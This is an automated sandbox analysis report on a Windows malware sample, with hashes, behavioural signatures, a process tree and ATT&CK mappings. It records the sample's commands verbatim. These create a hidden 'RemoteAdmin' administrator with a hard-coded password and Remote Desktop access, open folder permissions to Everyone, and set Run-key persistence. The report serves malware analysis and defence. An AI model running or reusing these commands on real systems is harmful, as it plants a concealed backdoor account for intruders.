Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 25/08/2024, 10:10
Static task: static1
Behavioral task: behavioral1
- Sample: c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
- Resource: win7-20240704-en
Behavioral task: behavioral2
- Sample: c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
- Resource: win10v2004-20240802-en
General
- Target: c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
- Size: 854KB
- MD5: c0822b0d14b651b6e1c018c8c0bca9d2
- SHA1: 424d410d3daa2f3b5cfe5cc369f7eee654c042ba
- SHA256: a4a71e8143d4c321322829a9e0b84eff48327bdc39fc3f0a8c56263f153d17d3
- SHA512: d4a45f060923c15641bd0588a4799659511dffb8998943514a7388d340267824bbc9f8bd93a30ef139364a1048d65c773c5f2a3aabad23519130363827b1337f
- SSDEEP: 12288:AraepSMZpe26zfs25lRL0Ktu9w4xW7tI4m7kbchfide0sHTkz21ITCqE38AExV:aZwr26jNLeeClWQAU6eKz2COqaF0
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid | Process
2420 | net.exe
3112 | net1.exe
-
Indicator Removal: Network Share Connection Removal 1 TTPs 2 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
pid | Process
4828 | net.exe
832 | net1.exe
-
Executes dropped EXE 10 IoCs
pid | Process
1100 | tzuP.exe
2756 | desktop.exe
4692 | cmss.exe
1792 | msn.exe
3064 | lsass.exe
2428 | lsass.exe
4684 | msn.exe
1808 | cmss.exe
3408 | lsass.exe
1596 | lsass.exe
-
Loads dropped DLL 4 IoCs
pid | Process
2756 | desktop.exe
2756 | desktop.exe
3064 | lsass.exe
4692 | cmss.exe
-
Adds Run key to start application 2 TTPs 2 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ccUpdate = "C:\\Windows\\msn.exe" | desktop.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ccUpdate = "C:\\Windows\\msn.exe" | cmss.exe
-
Drops desktop.ini file(s) 2 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\Accessories\Common\desktop.ini | desktop.exe
File created | C:\Program Files\Accessories\Common\desktop.ini | desktop.exe
-
Modifies WinLogon 2 TTPs 3 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | cmss.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | cmss.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\RemoteAdmin = "0" | cmss.exe
-
Drops file in System32 directory 1 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\MSWINSCK.OCX | desktop.exe
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\RemoteAdmin = "0" | cmss.exe
-
Drops file in Program Files directory 7 IoCs
description | ioc | Process
File opened for modification | C:\Program Files\Accessories\Common\clog.txt | msn.exe
File opened for modification | C:\Program Files\Accessories\Common\25 Aug 24 10_10_38 Admin .rna | cmss.exe
File opened for modification | C:\Program Files\Accessories\Common\25 Aug 24 10_10_48 Admin .rna | cmss.exe
File opened for modification | C:\Program Files\Accessories\Common | desktop.exe
File opened for modification | C:\Program Files\Accessories\Common\desktop.ini | desktop.exe
File created | C:\Program Files\Accessories\Common\desktop.ini | desktop.exe
File opened for modification | C:\Program Files\Accessories\Common\log.txt | msn.exe
-
Drops file in Windows directory 9 IoCs
description | ioc | Process
File created | C:\Windows\spool\cmss.exe | desktop.exe
File created | C:\Windows\netcox.exe | desktop.exe
File created | C:\Windows\ziplog.txt | desktop.exe
File created | C:\Windows\hpreg.dll | desktop.exe
File created | C:\Windows\spool\lsass.exe | desktop.exe
File opened for modification | C:\Windows\spool\lsass.exe | desktop.exe
File opened for modification | C:\Windows\hpreg.dll | desktop.exe
File created | C:\Windows\msn.exe | desktop.exe
File created | C:\Windows\refsdm.dll | desktop.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 25 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe, cmd.exe, cacls.exe, net.exe, net1.exe, msn.exe, lsass.exe, tzuP.exe, desktop.exe, cmss.exe
-
Modifies registry class 64 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | Process
4692 | cmss.exe (repeated)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | Process
1792 | msn.exe
-
Suspicious use of SetWindowsHookEx 10 IoCs
pid | Process
2756 | desktop.exe
4692 | cmss.exe
1792 | msn.exe
3064 | lsass.exe
2428 | lsass.exe
4684 | msn.exe
1808 | cmss.exe
3408 | lsass.exe
1792 | msn.exe
1596 | lsass.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
PID 1068: C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\c0822b0d14b651b6e1c018c8c0bca9d2_JaffaCakes118.exe"
  Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
  PID 1100: C:\Users\Admin\AppData\Local\Temp\tzuP.exe
    Command line: tzuP.exe
    Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
    PID 2756: C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Compress0\desktop.exe"
      Signatures: Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Drops desktop.ini file(s); Drops file in System32 directory; Drops file in Program Files directory; Drops file in Windows directory; System Location Discovery: System Language Discovery; Modifies registry class; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      PID 264: C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c echo y| CACLS C:\Windows\spool /G Everyone:f
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        PID 212: C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
          Signatures: System Location Discovery: System Language Discovery
        PID 3736: C:\Windows\SysWOW64\cacls.exe
          Command line: CACLS C:\Windows\spool /G Everyone:f
          Signatures: System Location Discovery: System Language Discovery
      PID 1048: C:\Windows\SysWOW64\cmd.exe
        Command line: cmd /c echo y| CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        PID 4968: C:\Windows\SysWOW64\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
          Signatures: System Location Discovery: System Language Discovery
        PID 740: C:\Windows\SysWOW64\cacls.exe
          Command line: CACLS C:\PROGRA~1\ACCESS~1\Common /G Everyone:f
          Signatures: System Location Discovery: System Language Discovery
      PID 4692: C:\Windows\spool\cmss.exe
        Command line: C:\Windows\spool\cmss.exe
        Signatures: Executes dropped EXE; Loads dropped DLL; Adds Run key to start application; Modifies WinLogon; Hide Artifacts: Hidden Users; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
        PID 2428: C:\Windows\spool\lsass.exe
          Command line: C:\Windows\spool\lsass.exe
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
        PID 4684: C:\Windows\msn.exe
          Command line: C:\Windows\msn.exe
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
        PID 3408: C:\Windows\spool\lsass.exe
          Command line: C:\Windows\spool\lsass.exe
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
        PID 3684: C:\Windows\SysWOW64\net.exe
          Command line: net user RemoteAdmin ecotopia /add
          Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
          PID 4608: C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 user RemoteAdmin ecotopia /add
            Signatures: System Location Discovery: System Language Discovery
        PID 1404: C:\Windows\SysWOW64\net.exe
          Command line: net localgroup Administrators /Add RemoteAdmin
          Signatures: System Location Discovery: System Language Discovery
          PID 3052: C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 localgroup Administrators /Add RemoteAdmin
            Signatures: System Location Discovery: System Language Discovery
        PID 4828: C:\Windows\SysWOW64\net.exe
          Command line: net localgroup users /Delete RemoteAdmin
          Signatures: Indicator Removal: Network Share Connection Removal; System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
          PID 832: C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 localgroup users /Delete RemoteAdmin
            Signatures: Indicator Removal: Network Share Connection Removal; System Location Discovery: System Language Discovery
        PID 2420: C:\Windows\SysWOW64\net.exe
          Command line: net localgroup "Remote Desktop Users" /Add RemoteAdmin
          Signatures: Remote Service Session Hijacking: RDP Hijacking; System Location Discovery: System Language Discovery
          PID 3112: C:\Windows\SysWOW64\net1.exe
            Command line: C:\Windows\system32\net1 localgroup "Remote Desktop Users" /Add RemoteAdmin
            Signatures: Remote Service Session Hijacking: RDP Hijacking; System Location Discovery: System Language Discovery
      PID 1792: C:\Windows\msn.exe
        Command line: C:\Windows\msn.exe
        Signatures: Executes dropped EXE; Drops file in Program Files directory; System Location Discovery: System Language Discovery; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
        PID 3064: C:\Windows\spool\lsass.exe
          Command line: C:\Windows\spool\lsass.exe
          Signatures: Executes dropped EXE; Loads dropped DLL; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
        PID 1808: C:\Windows\spool\cmss.exe
          Command line: C:\Windows\spool\cmss.exe
          Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
      PID 1596: C:\Windows\spool\lsass.exe
        Command line: C:\Windows\spool\lsass.exe
        Signatures: Executes dropped EXE; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
- Account Manipulation: 1
- Boot or Logon Autostart Execution: 2
  - Registry Run Keys / Startup Folder: 1
  - Winlogon Helper DLL: 1
Privilege Escalation
- Account Manipulation: 1
- Boot or Logon Autostart Execution: 2
  - Registry Run Keys / Startup Folder: 1
  - Winlogon Helper DLL: 1
Defense Evasion
- Hide Artifacts: 1
  - Hidden Users: 1
- Indicator Removal: 1
  - Network Share Connection Removal: 1
- Modify Registry: 2
Downloads